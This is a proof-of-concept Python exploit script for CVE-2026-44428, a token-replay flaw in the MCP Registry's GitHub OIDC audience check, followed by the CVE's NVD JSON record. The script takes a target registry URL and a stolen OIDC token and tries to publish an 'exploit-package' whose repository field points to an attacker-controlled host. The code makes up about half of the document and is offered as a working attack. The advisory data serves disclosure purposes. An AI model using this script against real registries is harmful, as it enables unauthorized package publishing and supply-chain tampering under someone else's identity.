CVE-2026-44428

# Proof of Concept for CVE-2026-44428 # This script demonstrates how a token obtained for one registry # can be replayed to another registry due to the global audience issue. import requests import sys def exploit(target_url, stolen_token): """ Attempt to publish a package using a token from a different registry. """ # The endpoint vulnerable to the replay attack endpoint = f"{target_url}/api/exchange" headers = { "Authorization": f"Bearer {stolen_token}", "Content-Type": "application/json" } # Malicious payload intended for the target registry data = { "name": "exploit-package", "version": "1.0.0", "repository_url": "http://attacker-controlled-repo.com" } try: print(f"[*] Sending replay attack request to {endpoint}...") response = requests.post(endpoint, json=data, headers=headers) if response.status_code == 200: print("[+] Success! The registry accepted the token from another instance.") print(f"[+] Response: {response.text}") else: print(f"[-] Failed. Status Code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python poc.py <target_registry_url> <stolen_oidc_token>") sys.exit(1) TARGET_URL = sys.argv[1] TOKEN = sys.argv[2] exploit(TARGET_URL, TOKEN)

{"cve": {"id": "CVE-2026-44428", "sourceIdentifier": "[email protected]", "published": "2026-05-14T22:16:44.593", "lastModified": "2026-05-15T17:23:35.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MCP Registry provides MCP clients with a list of MCP servers, like an app store for MCP servers. Prior to 1.7.6, the client-side and server-side GitHub OIDC flow is bound only to a global audience string, not to the specific registry instance being targeted. On the client side, the publisher always appends audience=mcp-registry when requesting the GitHub Actions ID token, regardless of the selected --registry URL. On the server side, the exchange endpoint validates only that same fixed audience and then derives publish permissions directly from repository_owner. As a result, a token legitimately obtained while interacting with one registry deployment remains acceptable to any other deployment that shares the same code and audience string. This vulnerability is fixed in 1.7.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mcp_registry:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.6", "matchCriteriaId": "E1BC5309-2424-4E6E-B821-B3172A46BC05"}]}]}], "references": [{"url": "https://github.com/modelcontextprotocol/registry/security/advisories/GHSA-95c3-6vvw-4mrq", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}